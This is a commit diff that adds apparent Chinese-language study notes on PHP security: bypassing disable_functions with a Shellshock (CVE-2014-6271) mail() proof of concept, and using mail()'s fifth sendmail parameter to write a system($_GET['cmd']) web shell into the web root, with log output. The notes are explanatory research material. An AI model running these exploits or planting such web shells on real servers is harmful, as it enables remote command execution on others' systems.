jiangsir404
diff --git a/‎bypass disable_functions.md
Lines changed: 74 additions & 0 deletions b/‎bypass disable_functions.md
Lines changed: 74 additions & 0 deletions
diff --git a/‎parse_url.md
Lines changed: 0 additions & 1 deletion b/‎parse_url.md
Lines changed: 0 additions & 1 deletion
diff --git a/‎php mail函数.md
Lines changed: 158 additions & 0 deletions b/‎php mail函数.md
Lines changed: 158 additions & 0 deletions
diff --git a/‎代码审计圈/other.md
Lines changed: 0 additions & 30 deletions b/‎代码审计圈/other.md
Lines changed: 0 additions & 30 deletions
@@ -0,0 +1,74 @@
+看一下php manual手册中的定义
+
+```
+disable_classes string
+本指令可以使你出于安全的理由禁用某些类。用逗号分隔类名。disable_classes 不受安全模式的影响。 本指令只能设置在 php.ini 中。例如不能将其设置在 httpd.conf。
+```
+php中有一个table存放已定义的函数
+disabled_function的原理便是，将函数名从这个table删除。对于绕过disabled_function的话，
+总共有几种方式
+
+
+```
+1、加载so文件，模块文件
+2、找到生僻的函数，里面带有执行命令
+3、一些第三方的漏洞，比如exim、破壳漏洞
+```
+
+
+绕过1: mail函数
+
+参考 https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html
+
+```
+char *sendmail_path = INI_STR("sendmail_path"); 
+char *sendmail_cmd = NULL;
+...
+if (extra_cmd != NULL) {
+	spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
+} else {
+	sendmail_cmd = sendmail_path;
+}
+...
+#ifdef PHP_WIN32 
+  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); 
+#else 
+  /* Since popen() doesn't indicate if the internal fork() doesn't work 
+   * (e.g. the shell can't be executed) we explicitly set it to 0 to be 
+   * sure we don't catch any older errno value. */ 
+  errno = 0; 
+  sendmail = popen(sendmail_cmd, "w"); 
+#endif
+```
+
+sendmail_path是从php.ini获取过来的，默认是`/usr/sbin/sendmail -t -i`, extra_cmd 是mail函数的第五个参数
+
+
+extra_cmd（用户传入的一些额外参数）存在的时候，调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。  最后调用popen执行senmail_cmd命令.
+
+
+如果系统默认sh是bash，popen会派生bash进程。而之前的bash破壳（CVE-2014-6271）漏洞，直接导致我们可以利用mail()函数执行任意命令，绕过disable_functions。 
+
+> 同样，我们搜索一下php的源码，可以发现，明里调用popen派生进程的php函数还有imap_mail，如果你仅仅通过禁用mail函数来规避这个安全问题，那么imap_mail是可以做替代的。当然，php里还可能有其他地方有调用popen或其他能够派生bash子进程的函数，通过这些地方，都可以通过破壳漏洞执行命令的。
+
+poc:
+
+```
+<?php 
+function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 
+   $tmp = tempnam(".","data"); 
+   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 
+   // In Safe Mode, the user may only alter environment variableswhose names 
+   // begin with the prefixes supplied by this directive. 
+   // By default, users will only be able to set environment variablesthat 
+   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, 
+   // PHP will let the user modify ANY environment variable! 
+   mail("[email protected]","","","","-bv"); // -bv so we don't actuallysend any mail 
+   $output = @file_get_contents($tmp); 
+   @unlink($tmp); 
+   if($output != "") return $output; 
+   else return "No output, or not vuln."; 
+} 
+echo shellshock($_REQUEST["cmd"]); 
+?>
+```
@@ -0,0 +1,158 @@
+php manual 手册上的介绍
+
+	bool mail ( string $to , string $subject , string $message [, mixed $additional_headers [, string $additional_parameters ]] )
+
+```
+To 目的邮箱地址
+Subject 邮箱的主题
+Message 邮件的主题部分
+Headers 头信息
+Parameters 参数设置
+```
+
+```
+<?php
+$to      = '[email protected]';
+$subject = 'the subject';
+$message = 'hello';
+$headers = 'From: [email protected]' . "\r\n" .
+    'Reply-To: [email protected]' . "\r\n" .
+    'X-Mailer: PHP/' . phpversion();
+
+mail($to, $subject, $message, $headers);
+?>
+```
+
+PHP中的mail()函数在一定的条件下可以造成远程代码执行漏洞，mail()函数一共具有5个参数，当第五个参数存在并且我们可控的时候，就会造成代码执行漏洞，这个漏洞最近被RIPS爆出了一个command execution via email in Roundcube 1.2.2，就是由于不正当的使用了mail()函数并且未对参数加以过滤造成的。
+
+
+
+这个参数主要的选项有：
+```
+-O option = value
+QueueDirectory = queuedir 选择队列消息
+
+-X logfile
+这个参数可以指定一个目录来记录发送邮件时的详细日志情况，我们正式利用这个参数来达到我们的目的。
+
+-f from email
+这个参数可以让我们指定我们发送邮件的邮箱地址。
+```
+
+现在我们尝试在本地复现出这个漏洞，注意事项：
+
+```
+目标系统必须使用函数mail发送邮件，而不是使用SMTP的服务器；
+mail函数需要配置实用sendmail系统来进行邮件的发送；
+PHP配置中必须关闭safe_mode功能；
+必须知道目标服务器的Web根目录
+```
+
+test.php
+
+```
+$to = '[email protected]';
+$subject = '<?php system($_GET["cmd"]); ?>';
+$message = '';
+$headers = '';
+$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
+mail($to, $subject, $message, $headers, $options);
+```
+
+运行即可再/var/www/html/目录下生成rce.php文件，内容为:
+
+```
+32512 <<< To: [email protected]
+32512 <<< Subject: <?php system($_GET["cmd"]); ?>
+32512 <<< X-PHP-Originating-Script: 0:mail.php
+32512 <<< 
+32512 <<< 
+32512 <<< [EOF]
+32512 === CONNECT [127.0.0.1]
+32512 <<< 220 lj ESMTP Sendmail 8.15.2/8.15.2/Debian-3; Sun, 30 Sep 2018 16:32:30 +0800; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]
+32512 >>> EHLO lj
+32512 <<< 250-lj Hello localhost [127.0.0.1], pleased to meet you
+32512 <<< 250-ENHANCEDSTATUSCODES
+32512 <<< 250-PIPELINING
+32512 <<< 250-EXPN
+32512 <<< 250-VERB
+32512 <<< 250-8BITMIME
+32512 <<< 250-SIZE
+32512 <<< 250-DSN
+32512 <<< 250-ETRN
+32512 <<< 250-AUTH DIGEST-MD5 CRAM-MD5
+32512 <<< 250-DELIVERBY
+32512 <<< 250 HELP
+32512 >>> MAIL From:<root@lj> SIZE=89 AUTH=root@lj
+32512 <<< 250 2.1.0 <root@lj>... Sender ok
+32512 >>> RCPT To:<[email protected]>
+32512 >>> DATA
+32512 <<< 250 2.1.5 <[email protected]>... Recipient ok
+32512 <<< 354 Enter mail, end with "." on a line by itself
+32512 >>> Received: (from root@localhost)
+32512 >>> 	by lj (8.15.2/8.15.2/Submit) id w8U8WToP032512;
+32512 >>> 	Sun, 30 Sep 2018 16:32:29 +0800
+32512 >>> Date: Sun, 30 Sep 2018 16:32:29 +0800
+32512 >>> From: root <root@lj>
+32512 >>> Message-Id: <201809300832.w8U8WToP032512@lj>
+32512 >>> To: [email protected]
+32512 >>> Subject: <?php system($_GET["cmd"]); ?>
+32512 >>> X-PHP-Originating-Script: 0:mail.php
+32512 >>> 
+32512 >>> 
+32512 >>> .
+32512 <<< 250 2.0.0 w8U8WUsh032770 Message accepted for delivery
+32512 >>> QUIT
+32512 <<< 221 2.0.0 lj closing connection
+```
+
+我们指定好使用mail函数时的五个参数，在第二个参数中放入我们打算写入的内容，第五个参数中指定我们要写入的目录（必须是PHP文件）
+
+截取片段mail.c的源码
+```
+PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC)
+{
+#if (defined PHP_WIN32 || defined NETWARE)
+	int tsm_err;
+	char *tsm_errmsg = NULL;
+#endif
+	FILE *sendmail;
+	int ret;
+	char *sendmail_path = INI_STR("sendmail_path");
+	char *sendmail_cmd = NULL;
+	char *mail_log = INI_STR("mail.log");
+	char *hdr = headers;
+#if PHP_SIGCHILD
+	void (*sig_handler)() = NULL;
+#endif
+
+...
+
+	if (extra_cmd != NULL) {
+		spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
+	} else {
+		sendmail_cmd = sendmail_path;
+	}
+
+...
+
+#ifdef PHP_WIN32
+	sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
+#else
+	/* Since popen() doesn't indicate if the internal fork() doesn't work
+	 * (e.g. the shell can't be executed) we explicitly set it to 0 to be
+	 * sure we don't catch any older errno value. */
+	errno = 0;
+	sendmail = popen(sendmail_cmd, "w");
+#endif
+	if (extra_cmd != NULL) {
+		efree (sendmail_cmd);
+	}
+```
+
+我们可以看到mail函数的底层实际上是调用sendmail 函数来执行命令的。
+
+
+PHPMailer < 5.2.18和Roundcube 两个应用都爆出来过mail函数导致的命令执行漏洞。
+
+Roundcube 1.2.2 远程命令执行漏洞分析 https://paper.seebug.org/138/